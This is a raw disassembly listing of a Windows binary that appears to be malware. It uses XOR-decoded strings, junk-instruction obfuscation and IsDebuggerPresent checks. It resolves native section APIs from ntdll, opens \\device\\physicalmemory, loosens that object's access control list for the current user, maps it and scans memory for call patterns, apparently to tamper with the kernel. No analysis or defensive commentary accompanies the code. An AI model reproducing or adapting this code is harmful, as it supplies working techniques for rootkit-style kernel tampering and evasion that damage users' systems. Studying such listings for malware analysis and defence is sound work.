mov eax, [ebp+var_8]
add eax, 10h
push eax
push 40h
call sub_40CA7C ; LocalAlloc
mov [ebp+var_C], eax
push 0
cmp [ebp+arg_4], 0
jz short loc_401B8F
mov eax, [ebp+arg_4]
mov [ebp+var_24], eax
jmp short loc_401B95
; ---------------------------------------------------------------------------
loc_401B8F: ; CODE XREF: sub_401AF1+94�j
lea eax, [ebp+var_18]
mov [ebp+var_24], eax
loc_401B95: ; CODE XREF: sub_401AF1+9C�j
push [ebp+var_24]
push [ebp+var_8]
push [ebp+var_C]
push ebx
call sub_40CAAC ; ReadFile
mov [ebp+var_D], 1Ch
sub [ebp+var_D], 8
push ebx
call sub_40C9B0 ; CloseHandle
lea edi, [ebp+var_1F]
lea esi, byte_43C2BB
mov ecx, 7
rep movsb
mov eax, [ebp+var_C]
loc_401BC5: ; CODE XREF: sub_401AF1+62�j
pop edi
pop esi
pop ebx
leave
retn
sub_401AF1 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 25Eh
push esi
push dword ptr [ebp+8]
mov eax, dword_43C2CC
lea eax, ds:4108A0h[eax]
push eax
call sub_40CE18
add esp, 0Ch
xor edi, edi
jmp short loc_401C10
; ---------------------------------------------------------------------------
loc_401BF9: ; CODE XREF: .text:00401C12�j
mov eax, dword_43C2CC
add eax, edi
lea eax, ds:4108A0h[eax]
movsx edx, byte ptr [eax]
xor edx, 6Eh
mov [eax], dl
inc edi
loc_401C10: ; CODE XREF: .text:00401BF7�j
cmp edi, esi
jl short loc_401BF9
mov dword ptr [ebp-8], 0FDh
mov eax, dword_43C2CC
add eax, esi
mov byte ptr ds:dword_4108A0[eax], 0
xor edi, edi
mov edi, dword_43C2CC
mov eax, edi
lea eax, [eax+esi+3]
mov dword_43C2CC, eax
add dword_43C2CC, 2
cmp dword_43C2CC, 0E0Fh
jle short loc_401C57
and dword_43C2CC, 0
loc_401C57: ; CODE XREF: .text:00401C4E�j
mov dword ptr [ebp-0Ch], 94h
lea eax, dword_4108A0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401C68 proc near ; CODE XREF: sub_4056CB+66F�p
; sub_409A96+F4F�p
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov ebx, [ebp+arg_4]
call sub_40C944 ; GetCurrentThreadId
mov edi, ebx
jmp short loc_401CB9
; ---------------------------------------------------------------------------
loc_401C7E: ; CODE XREF: sub_401C68+55�j
cmp byte ptr [esi+edi], 0Dh
jnz short loc_401CB8
mov [ebp+var_1], 0B3h
add [ebp+var_1], 1
mov eax, edi
sub eax, ebx
push eax
mov eax, esi
add eax, ebx
push eax
push [ebp+arg_8]
call sub_40CE18
add esp, 0Ch
call sub_40CA58 ; IsDebuggerPresent
mov eax, edi
sub eax, ebx
mov edx, [ebp+arg_8]
mov byte ptr [edx+eax], 0
mov eax, edi
add eax, 2
jmp short loc_401D20
; ---------------------------------------------------------------------------
loc_401CB8: ; CODE XREF: sub_401C68+1A�j
inc edi
loc_401CB9: ; CODE XREF: sub_401C68+14�j
cmp byte ptr [esi+edi], 0
jnz short loc_401C7E
or ebx, ebx
jz short loc_401CE2
cmp byte ptr [esi+edi], 0
jnz short loc_401CE2
mov eax, edi
dec eax
cmp byte ptr [esi+eax], 0Ah
jnz short loc_401CE2
call sub_40C998 ; GetProcessHeap
mov eax, [ebp+arg_8]
mov byte ptr [eax], 0
mov eax, ebx
inc eax
jmp short loc_401D20
; ---------------------------------------------------------------------------
loc_401CE2: ; CODE XREF: sub_401C68+59�j
; sub_401C68+5F�j ...
mov eax, esi
add eax, ebx
push eax
call sub_40CB60 ; lstrlen
mov edi, eax
or edi, edi
jz short loc_401D1E
mov [ebp+var_2], 0D8h
sub [ebp+var_2], 11h
mov eax, esi
add eax, ebx
push eax
push [ebp+arg_8]
call sub_40C8DC
mov [ebp+var_1], 1
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
mov eax, ebx
add eax, edi
jmp short loc_401D20
; ---------------------------------------------------------------------------
loc_401D1E: ; CODE XREF: sub_401C68+88�j
xor eax, eax
loc_401D20: ; CODE XREF: sub_401C68+4E�j
; sub_401C68+78�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_401C68 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 2DEh
push esi
push dword ptr [ebp+8]
mov eax, dword_43C2D8
lea eax, ds:437270h[eax]
push eax
call sub_40CE18
add esp, 0Ch
xor edi, edi
jmp short loc_401D6A
; ---------------------------------------------------------------------------
loc_401D53: ; CODE XREF: .text:00401D6C�j
mov eax, dword_43C2D8
add eax, edi
lea eax, ds:437270h[eax]
movsx edx, byte ptr [eax]
xor edx, 50h
mov [eax], dl
inc edi
loc_401D6A: ; CODE XREF: .text:00401D51�j
cmp edi, esi
jl short loc_401D53
mov eax, dword_43C2D8
add eax, esi
mov byte ptr ds:dword_437270[eax], 0
xor edi, edi
mov edi, dword_43C2D8
add dword_43C2D8, 3
mov eax, dword_43C2D8
lea eax, [eax+esi+3]
mov dword_43C2D8, eax
cmp eax, 0E0Eh
jle short loc_401DA8
and dword_43C2D8, 0
loc_401DA8: ; CODE XREF: .text:00401D9F�j
mov dword ptr [ebp-8], 2Eh
lea eax, dword_437270[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401DB9 proc near ; CODE XREF: sub_402976+80�p
var_1A = word ptr -1Ah
var_14 = dword ptr -14h
var_10 = word ptr -10h
var_D = byte ptr -0Dh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
push edi
mov [ebp+var_4], 789Ah
sub [ebp+var_4], 3236h
inc dword_43C23C
call sub_40C968 ; RtlGetLastWin32Error
mov ebx, [ebp+arg_0]
and ds:dword_40E064, 0
and ds:dword_41E998, 0
and ds:dword_41EAB0, 0
and ds:dword_40F260, 0
mov ds:dword_41B7B8, 4
mov ds:dword_414DE4, 4
loc_401E0E: ; CODE XREF: sub_401DB9+127�j
; sub_401DB9+143�j ...
mov eax, ebx
inc ebx
mov al, [eax]
mov ds:byte_414DE0, al
movzx eax, ds:byte_414DE0
or eax, eax
jl loc_402086
cmp eax, 0FFh
jg loc_402086
jmp off_43C2E8[eax*4]
; ---------------------------------------------------------------------------
mov word ptr [ebp-0Eh], 1BB0h
movzx eax, word ptr [ebp-0Eh]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp-0Eh], ax
loc_401E4D: ; CODE XREF: sub_401DB9+79�j
; sub_401DB9+281�j
; DATA XREF: ...
or byte ptr ds:dword_41E998, 40h
jmp loc_402086
; ---------------------------------------------------------------------------
inc dword_43C23C
loc_401E5F: ; CODE XREF: sub_401DB9+79�j
; sub_401DB9+281�j
; DATA XREF: ...
xor eax, eax
cmp byte ptr [ebx], 20h
setnz al
dec eax
and eax, 4
inc eax
mov [ebp+var_14], eax
add ds:dword_41EAB0, eax
jmp loc_402086
; ---------------------------------------------------------------------------
loc_401E7A: ; CODE XREF: sub_401DB9+79�j
; sub_401DB9+281�j
; DATA XREF: ...
or byte ptr ds:dword_41E998, 40h
test byte ptr [ebx], 38h
jnz loc_402086
loc_401E8A: ; CODE XREF: sub_401DB9+79�j
; DATA XREF: .data:0043C2F8�o ...
test ds:byte_414DE0, 1
jz short loc_401EA3
mov eax, ds:dword_41B7B8
add ds:dword_41EAB0, eax
jmp loc_402086
; ---------------------------------------------------------------------------
loc_401EA3: ; CODE XREF: sub_401DB9+D8�j
inc ds:dword_41EAB0
jmp loc_402086
; ---------------------------------------------------------------------------
loc_401EAE: ; CODE XREF: sub_401DB9+79�j
; sub_401DB9+281�j
; DATA XREF: ...
inc ds:dword_41EAB0
jmp loc_402086
; ---------------------------------------------------------------------------
inc dword_43C23C
loc_401EBF: ; CODE XREF: sub_401DB9+79�j
; DATA XREF: .data:0043C380�o ...
test byte ptr ds:dword_41E998, 10h
jz short loc_401ECF
xor eax, eax
jmp loc_402223
; ---------------------------------------------------------------------------
loc_401ECF: ; CODE XREF: sub_401DB9+10D�j
or byte ptr ds:dword_41E998, 10h
mov al, ds:byte_414DE0
mov ds:byte_40F26C, al
jmp loc_401E0E
; ---------------------------------------------------------------------------
loc_401EE5: ; CODE XREF: sub_401DB9+79�j
; sub_401DB9+281�j
; DATA XREF: ...
test byte ptr ds:dword_41E998, 4
jz short loc_401EF5
xor eax, eax
jmp loc_402223
; ---------------------------------------------------------------------------
loc_401EF5: ; CODE XREF: sub_401DB9+133�j
or byte ptr ds:dword_41E998, 4
jmp loc_401E0E
; ---------------------------------------------------------------------------
loc_401F01: ; CODE XREF: sub_401DB9+79�j
; sub_401DB9+281�j
; DATA XREF: ...
test byte ptr ds:dword_41E998, 8
jz short loc_401F11
xor eax, eax
jmp loc_402223
; ---------------------------------------------------------------------------
loc_401F11: ; CODE XREF: sub_401DB9+14F�j
call sub_40C998 ; GetProcessHeap
or byte ptr ds:dword_41E998, 8
mov al, ds:byte_414DE0
mov ds:byte_41FD40, al
jmp loc_401E0E
; ---------------------------------------------------------------------------
loc_401F2C: ; CODE XREF: sub_401DB9+79�j
; DATA XREF: .data:0043C480�o
test byte ptr ds:dword_41E998, 1
jz short loc_401F3C
xor eax, eax
jmp loc_402223
; ---------------------------------------------------------------------------
loc_401F3C: ; CODE XREF: sub_401DB9+17A�j
or byte ptr ds:dword_41E998, 1
mov ds:dword_41B7B8, 2
jmp loc_401E0E
; ---------------------------------------------------------------------------
loc_401F52: ; CODE XREF: sub_401DB9+79�j
; DATA XREF: .data:0043C484�o
test byte ptr ds:dword_41E998, 2
jz short loc_401F62
xor eax, eax
jmp loc_402223
; ---------------------------------------------------------------------------
loc_401F62: ; CODE XREF: sub_401DB9+1A0�j
call sub_40C9D4 ; GetVersion
or byte ptr ds:dword_41E998, 2
mov ds:dword_414DE4, 2
jmp loc_401E0E
; ---------------------------------------------------------------------------
inc dword_43C23C
loc_401F83: ; CODE XREF: sub_401DB9+79�j
; sub_401DB9+281�j
; DATA XREF: ...
inc ds:dword_41EAB0
or byte ptr ds:dword_41E998, 40h
jmp loc_402086
; ---------------------------------------------------------------------------
loc_401F95: ; CODE XREF: sub_401DB9+79�j
; sub_401DB9+281�j
; DATA XREF: ...
mov eax, ds:dword_41B7B8
add ds:dword_41EAB0, eax
or byte ptr ds:dword_41E998, 40h
jmp loc_402086
; ---------------------------------------------------------------------------
loc_401FAC: ; CODE XREF: sub_401DB9+79�j
; sub_401DB9+281�j
; DATA XREF: ...
mov eax, ds:dword_41B7B8
add eax, 2
add ds:dword_41EAB0, eax
jmp loc_402086
; ---------------------------------------------------------------------------
loc_401FBF: ; CODE XREF: sub_401DB9+79�j
; sub_401DB9+281�j
; DATA XREF: ...
mov eax, ds:dword_414DE4
add ds:dword_40F260, eax
jmp loc_402086
; ---------------------------------------------------------------------------
loc_401FCF: ; CODE XREF: sub_401DB9+79�j
; sub_401DB9+281�j
; DATA XREF: ...
mov eax, ds:dword_41B7B8
add ds:dword_41EAB0, eax
jmp loc_402086
; ---------------------------------------------------------------------------
inc dword_43C23C
loc_401FE5: ; CODE XREF: sub_401DB9+79�j
; sub_401DB9+281�j
; DATA XREF: ...
add ds:dword_41EAB0, 2
jmp loc_402086
; ---------------------------------------------------------------------------
loc_401FF1: ; CODE XREF: sub_401DB9+79�j
; sub_401DB9+281�j
; DATA XREF: ...
add ds:dword_41EAB0, 3
jmp loc_402086
; ---------------------------------------------------------------------------
loc_401FFD: ; CODE XREF: sub_401DB9+79�j
; sub_401DB9+281�j
; DATA XREF: ...
xor eax, eax
jmp loc_402223
; ---------------------------------------------------------------------------
loc_402004: ; CODE XREF: sub_401DB9+79�j
; DATA XREF: .data:0043C324�o
or byte ptr ds:dword_41E998, 20h
mov eax, ebx
inc ebx
mov al, [eax]
mov ds:byte_42FD50, al
movzx eax, ds:byte_42FD50
or eax, eax
jl short loc_40207F
cmp eax, 0Bh
jg short loc_40202C
jmp off_43C6E8[eax*4]
; ---------------------------------------------------------------------------
loc_40202C: ; CODE XREF: sub_401DB9+26A�j
cmp eax, 80h
jl short loc_40207F
cmp eax, 0CFh
jg short loc_40207F
jmp off_43C518[eax*4]
; ---------------------------------------------------------------------------
call sub_40C938 ; GetCurrentProcessId
loc_402046: ; CODE XREF: sub_401DB9+79�j
; sub_401DB9+26C�j ...
or byte ptr ds:dword_41E998, 40h
mov [ebp+var_1A], 7C0Bh
sub [ebp+var_1A], 0D83h
jmp short loc_402086
; ---------------------------------------------------------------------------
inc dword_43C23C
jmp short loc_402086
; ---------------------------------------------------------------------------
loc_402063: ; CODE XREF: sub_401DB9+79�j
; sub_401DB9+26C�j ...
mov eax, ds:dword_41B7B8
add ds:dword_41EAB0, eax
jmp short loc_402086
; ---------------------------------------------------------------------------
loc_402070: ; CODE XREF: sub_401DB9+79�j
; sub_401DB9+26C�j ...
inc ds:dword_41EAB0
or byte ptr ds:dword_41E998, 40h
jmp short loc_402086
; ---------------------------------------------------------------------------
loc_40207F: ; CODE XREF: sub_401DB9+79�j
; sub_401DB9+265�j ...
xor eax, eax
jmp loc_402223
; ---------------------------------------------------------------------------
loc_402086: ; CODE XREF: sub_401DB9+68�j
; sub_401DB9+73�j ...
inc dword_43C23C
test byte ptr ds:dword_41E998, 40h
jz loc_4021A3
mov [ebp+var_D], 0C9h
add [ebp+var_D], 31h
mov eax, ebx
inc ebx
mov al, [eax]
mov ds:byte_430D94, al
mov [ebp+var_10], 1631h
inc [ebp+var_10]
movzx eax, ds:byte_430D94
and eax, 0C0h
mov byte ptr [ebp+var_14+3], al
movzx eax, ds:byte_430D94
and eax, 7
mov byte ptr [ebp+var_14+2], al
movzx eax, byte ptr [ebp+var_14+3]
cmp eax, 0C0h
jz loc_4021A3
mov eax, dword_43C2DC
mov [ebp-16h], eax
cmp byte ptr [ebp+var_14+3], 40h
jnz short loc_4020F4
inc ds:dword_40F260
loc_4020F4: ; CODE XREF: sub_401DB9+333�j
call sub_40C938 ; GetCurrentProcessId
movzx eax, byte ptr [ebp+var_14+3]
cmp eax, 80h
jnz short loc_40210F
mov eax, ds:dword_414DE4
add ds:dword_40F260, eax
loc_40210F: ; CODE XREF: sub_401DB9+349�j
call sub_40C938 ; GetCurrentProcessId
cmp ds:dword_414DE4, 2
jnz short loc_402147
sub_401DB9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40211D proc near ; DATA XREF: sub_440441+BC�o
mov dword ptr [ebp-1Ch], 38EAh
mov eax, 62BBh
mul dword ptr [ebp-1Ch]
mov [ebp-20h], eax
mov [ebp-1Ch], eax
cmp byte ptr [ebp-11h], 0
jnz short loc_4021A3
cmp byte ptr [ebp-12h], 6
jnz short loc_4021A3
add ds:dword_40F260, 2
jmp short loc_4021A3
; ---------------------------------------------------------------------------
loc_402147: ; CODE XREF: sub_401DB9+362�j
call sub_40C9D4 ; GetVersion
cmp byte ptr [ebp-12h], 4
jnz short loc_40218B
lea edi, [ebp-1Ch]
lea esi, aE7y ; "e=7y^"
mov ecx, 3
rep movsw
or byte ptr ds:dword_41E998, 80h
mov ax, word_43C2E6
mov [ebp-1Eh], ax
mov eax, ebx
inc ebx
mov al, [eax]
mov ds:byte_41B7B4, al
movzx eax, ds:byte_41B7B4
and eax, 7
mov [ebp-12h], al
loc_40218B: ; CODE XREF: sub_40211D+33�j
cmp byte ptr [ebp-12h], 5
jnz short loc_40219E
cmp byte ptr [ebp-11h], 0
jnz short loc_40219E
add ds:dword_40F260, 4
loc_40219E: ; CODE XREF: sub_40211D+72�j
; sub_40211D+78�j
call sub_40CA58 ; IsDebuggerPresent
loc_4021A3: ; CODE XREF: sub_401DB9+2DA�j
; sub_401DB9+321�j ...
and ds:dword_40F264, 0
jmp short loc_4021C4
; ---------------------------------------------------------------------------
loc_4021AC: ; CODE XREF: sub_40211D+B2�j
mov eax, ebx
inc ebx
mov edx, ds:dword_40F264
mov al, [eax]
mov ds:byte_414DD8[edx], al
inc ds:dword_40F264
loc_4021C4: ; CODE XREF: sub_40211D+8D�j
mov eax, ds:dword_40F260
cmp ds:dword_40F264, eax
jb short loc_4021AC
call sub_40C9C8 ; GetTickCount
and ds:dword_40F264, 0
jmp short loc_4021F7
; ---------------------------------------------------------------------------
loc_4021DF: ; CODE XREF: sub_40211D+E5�j
mov eax, ebx
inc ebx
mov edx, ds:dword_40F264
mov al, [eax]
mov ds:byte_43A4A0[edx], al
inc ds:dword_40F264
loc_4021F7: ; CODE XREF: sub_40211D+C0�j
mov eax, ds:dword_41EAB0
cmp ds:dword_40F264, eax
jb short loc_4021DF
mov word ptr [ebp-6], 5DBEh
sub word ptr [ebp-6], 0DB7h
inc dword_43C23C
mov eax, ebx
sub eax, [ebp+8]
mov ds:dword_40E064, eax
xor eax, eax
inc eax
loc_402223: ; CODE XREF: sub_401DB9+111�j
; sub_401DB9+137�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40211D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 37Eh
push esi
push dword ptr [ebp+8]
mov eax, dword_43CF50
lea eax, ds:418600h[eax]
push eax
call sub_40CE18
add esp, 0Ch
xor edi, edi
jmp short loc_40226E
; ---------------------------------------------------------------------------
loc_402257: ; CODE XREF: .text:00402270�j
mov eax, dword_43CF50
add eax, edi
lea eax, ds:418600h[eax]
movsx edx, byte ptr [eax]
xor edx, 6Dh
mov [eax], dl
inc edi
loc_40226E: ; CODE XREF: .text:00402255�j
cmp edi, esi
jl short loc_402257
mov dword ptr [ebp-8], 0EFh
mov eax, dword_43CF50
add eax, esi
mov byte ptr ds:dword_418600[eax], 0
mov edi, dword_43CF50
add dword_43CF50, 2
mov eax, dword_43CF50
add eax, 2
add eax, esi
mov dword_43CF50, eax
cmp eax, 0DF1h
jle short loc_4022B2
and dword_43CF50, 0
loc_4022B2: ; CODE XREF: .text:004022A9�j
mov dword ptr [ebp-0Ch], 2B9h
lea eax, dword_418600[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4022C3 proc near ; CODE XREF: sub_402B9B+23�p
var_5 = byte ptr -5
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
lea edi, [ebp+var_5]
lea esi, byte_43D002
xor ecx, ecx
inc ecx
rep movsb
push offset aNtdll_dll ; "ntdll.dll"
call sub_40C980 ; GetModuleHandleA
mov ebx, eax
call sub_40C944 ; GetCurrentThreadId
push offset aRtlinitunicode ; "RtlInitUnicodeString"
push ebx
call sub_40C98C ; GetProcAddress
mov ds:dword_430D8C, eax
mov [ebp+var_4], 7CB7h
inc [ebp+var_4]
push offset aNtunmapviewofs ; "NtUnmapViewOfSection"
push ebx
call sub_40C98C ; GetProcAddress
mov ds:dword_41D82C, eax
call sub_40C938 ; GetCurrentProcessId
push offset aNtopensection ; "NtOpenSection"
push ebx
call sub_40C98C ; GetProcAddress
mov ds:dword_41B7C0, eax
push offset aNtmapviewofsec ; "NtMapViewOfSection"
push ebx
call sub_40C98C ; GetProcAddress
mov ds:dword_41E9A8, eax
push offset aRtlntstatustod ; "RtlNtStatusToDosError"
push ebx
call sub_40C98C ; GetProcAddress
mov ds:dword_430D88, eax
call sub_40C944 ; GetCurrentThreadId
pop edi
pop esi
pop ebx
leave
retn
sub_4022C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402353 proc near ; CODE XREF: sub_402B9B+17D�p
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = byte ptr -7Ch
var_74 = byte ptr -74h
var_6F = byte ptr -6Fh
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = byte ptr -64h
var_5C = word ptr -5Ch
var_5A = word ptr -5Ah
var_57 = byte ptr -57h
var_56 = word ptr -56h
var_54 = word ptr -54h
var_52 = word ptr -52h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 84h
push ebx
push esi
push edi
mov [ebp+var_52], 1550h
movzx eax, [ebp+var_52]
imul eax, 5CD4h
mov [ebp+var_52], ax
call sub_40C9D4 ; GetVersion
push offset aDevicePhysical ; "\\device\\physicalmemory"
lea eax, [ebp+var_64]
push eax
call ds:dword_430D8C
mov [ebp+var_54], 2F0Dh
add [ebp+var_54], 32DAh
mov [ebp+var_18], 18h
call sub_40CA58 ; IsDebuggerPresent
and [ebp+var_14], 0
mov [ebp+var_56], 1A6Eh ; DATA XREF: sub_440441+2F�o
movzx eax, [ebp+var_56]
imul eax, 0F12h
mov [ebp+var_56], ax
lea eax, [ebp+var_64]
mov [ebp+var_10], eax
lea edi, [ebp+var_6F]
lea esi, a_v ; "_V"
mov ecx, 3
rep movsb
mov [ebp+var_C], 40h
and [ebp+var_8], 0
call sub_40C968 ; RtlGetLastWin32Error
and [ebp+var_4], 0
mov [ebp+var_57], 0E9h
movzx eax, [ebp+var_57]
imul eax, 3F21h
mov [ebp+var_57], al
and [ebp+var_30], 0
mov ebx, 2054h
mov eax, 545Bh
mul ebx
mov [ebp+var_80], eax
mov ebx, eax
and [ebp+var_2C], 0
call sub_40C9D4 ; GetVersion
mov [ebp+var_28], 1
mov [ebp+var_24], 1
mov ebx, 45h
add ebx, 1915h
lea eax, aCurrent_user ; "CURRENT_USER"
mov [ebp+var_20], eax
call sub_40C998 ; GetProcessHeap
mov [ebp+var_50], 2
mov [ebp+var_5A], 2AD4h
inc [ebp+var_5A]
mov [ebp+var_4C], 1
call sub_40C998 ; GetProcessHeap
and [ebp+var_48], 0
mov ebx, 7C60h
mov eax, 10A2h
mul ebx
mov [ebp+var_84], eax
mov ebx, eax
lea edi, [ebp+var_44]
lea esi, [ebp+var_30]
mov ecx, 5
rep movsd
lea eax, [ebp+var_18]
push eax
push 60000h
lea eax, [ebp+var_1C]
push eax
call ds:dword_41B7C0
call sub_40C9D4 ; GetVersion
lea eax, [ebp+var_74]
push eax
push 0
lea eax, [ebp+var_68]
push eax
push 0
push 0
push 4
push 6
push [ebp+var_1C]
call sub_40CD7C ; GetSecurityInfo
call sub_40C9C8 ; GetTickCount
lea eax, [ebp+var_6C]
push eax
push [ebp+var_68]
lea eax, [ebp+var_50]
push eax
mov eax, 2
sub eax, dword_43CF48
push eax
call sub_40CD94 ; SetEntriesInAclA
call sub_40C998 ; GetProcessHeap
push 0
push [ebp+var_6C]
push 0
push 0
push 4
push 6
push [ebp+var_1C]
call sub_40CD88 ; SetSecurityInfo
mov [ebp+var_5C], 20AEh
add [ebp+var_5C], 5BE4h
push [ebp+var_1C]
call sub_40C9B0 ; CloseHandle
call sub_40C998 ; GetProcessHeap
lea eax, [ebp+var_18]
push eax
push [ebp+var_50]
lea eax, [ebp+var_1C]
push eax
call ds:dword_41B7C0
lea edi, [ebp+var_7C]
lea esi, a3@f1qZ ; "3@f1Q|Z"
mov ecx, 2
rep movsd
mov eax, [ebp+var_1C]
pop edi
pop esi
pop ebx
leave
retn
sub_402353 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402528 proc near ; CODE XREF: sub_402B9B+244�p
var_21 = byte ptr -21h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
push esi
push edi
call sub_40C9D4 ; GetVersion
mov eax, [ebp+arg_4]
mov [ebp+var_14], eax
mov eax, [ebp+arg_8]
mov [ebp+var_8], eax
and [ebp+var_C], 0
lea edi, [ebp+var_21]
lea esi, aP0r ; "p0R#"
mov ecx, 5
rep movsb
mov eax, [ebp+var_14]
xor edx, edx
mov [ebp+var_18], edx
mov [ebp+var_1C], eax
mov [ebp+var_1], 7Ah
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
push 4
push 0
push 1
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_1C]
push eax
push [ebp+var_8]
push 0
lea eax, [ebp+var_C]
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
call ds:dword_41E9A8
mov [ebp+var_D], 77h
add [ebp+var_D], 1
mov eax, [ebp+var_C]
pop edi
pop esi
leave
retn
sub_402528 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4025A2 proc near ; CODE XREF: sub_402B9B+30F�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
call sub_40C938 ; GetCurrentProcessId
push [ebp+arg_0]
push 0FFFFFFFFh
call ds:dword_41D82C
call sub_40C968 ; RtlGetLastWin32Error
pop ebp
retn
sub_4025A2 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43D01C
lea eax, ds:412CE0h[eax]
push eax
call sub_40CE18
add esp, 0Ch
mov dword ptr [ebp-4], 37Bh
xor edi, edi
jmp short loc_402601
; ---------------------------------------------------------------------------
loc_4025EA: ; CODE XREF: .text:00402603�j
mov eax, dword_43D01C
add eax, edi
lea eax, ds:412CE0h[eax]
movsx edx, byte ptr [eax]
xor edx, 26h
mov [eax], dl
inc edi
loc_402601: ; CODE XREF: .text:004025E8�j
cmp edi, esi
jl short loc_4025EA
mov eax, dword_43D01C
add eax, esi
mov byte ptr ds:dword_412CE0[eax], 0
mov edi, dword_43D01C
mov eax, edi
add eax, 3
add eax, esi
mov dword_43D01C, eax
add dword_43D01C, 2
cmp dword_43D01C, 0DB3h
jle short loc_402640
and dword_43D01C, 0
loc_402640: ; CODE XREF: .text:00402637�j
mov dword ptr [ebp-8], 0A9h
lea eax, dword_412CE0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402651 proc near ; CODE XREF: sub_402976+20A�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = word ptr -10h
var_E = byte ptr -0Eh
var_6 = byte ptr -6
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
push edi
call sub_40C9C8 ; GetTickCount
mov [ebp+var_1], 49h
sub [ebp+var_1], 0C7h
xor ebx, ebx
loc_402669: ; CODE XREF: sub_402651+31A�j
mov [ebp+var_3], 28h
movzx eax, [ebp+var_3]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_3], al
mov eax, [ebp+arg_0]
movzx edx, byte ptr [eax+ebx]
cmp edx, 0FFh
jnz short loc_4026C0
movzx edx, byte ptr [ebx+eax+1]
cmp edx, 0FFh
jnz short loc_4026C0
movzx edx, byte ptr [ebx+eax+2]
cmp edx, 0FFh
jnz short loc_4026C0
movzx edx, byte ptr [ebx+eax+3]
cmp edx, 0FFh
jnz short loc_4026C0
movzx eax, byte ptr [ebx+eax+4]
cmp eax, 0FFh
jz loc_402971
loc_4026C0: ; CODE XREF: sub_402651+36�j
; sub_402651+43�j ...
call sub_40C9C8 ; GetTickCount
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_8]
lea eax, [eax+edx+5]
mov edx, [ebp+arg_0]
mov dl, [edx+ebx]
mov [eax+ebx], dl
lea edi, [ebp+var_6]
lea esi, byte_43D130
mov ecx, 3
rep movsb
mov [ebp+var_2], 0
loc_4026EC: ; CODE XREF: sub_402651+1A8�j
mov eax, [ebp+arg_0]
movzx edx, [ebp+var_2]
imul edx, 0Ch
movzx edx, byte_43D0C4[edx]
movzx ecx, byte ptr [eax+ebx]
cmp ecx, edx
jnz loc_4027D9
mov ecx, ebx
dec ecx
movzx ecx, byte ptr [eax+ecx]
cmp ecx, edx
jnz loc_4027D9
mov ecx, ebx
sub ecx, 2
movzx ecx, byte ptr [eax+ecx]
cmp ecx, edx
jnz loc_4027D9
mov ecx, ebx
sub ecx, 3
movzx ecx, byte ptr [eax+ecx]
cmp ecx, edx
jnz loc_4027D9
mov edx, ebx
sub edx, 4
movzx eax, byte ptr [eax+edx]
cmp eax, 0E8h
jnz loc_4027D9
mov [ebp+var_14], 7171h
mov eax, 21BFh
mul [ebp+var_14]
mov [ebp+var_20], eax
mov [ebp+var_14], eax
movzx eax, [ebp+var_2]
imul eax, 0Ch
push off_43D0CC[eax]
call sub_40C980 ; GetModuleHandleA
movzx edi, [ebp+var_2]
imul edi, 0Ch
push off_43D0C8[edi]
push eax
call sub_40C98C ; GetProcAddress
mov [ebp+var_18], eax
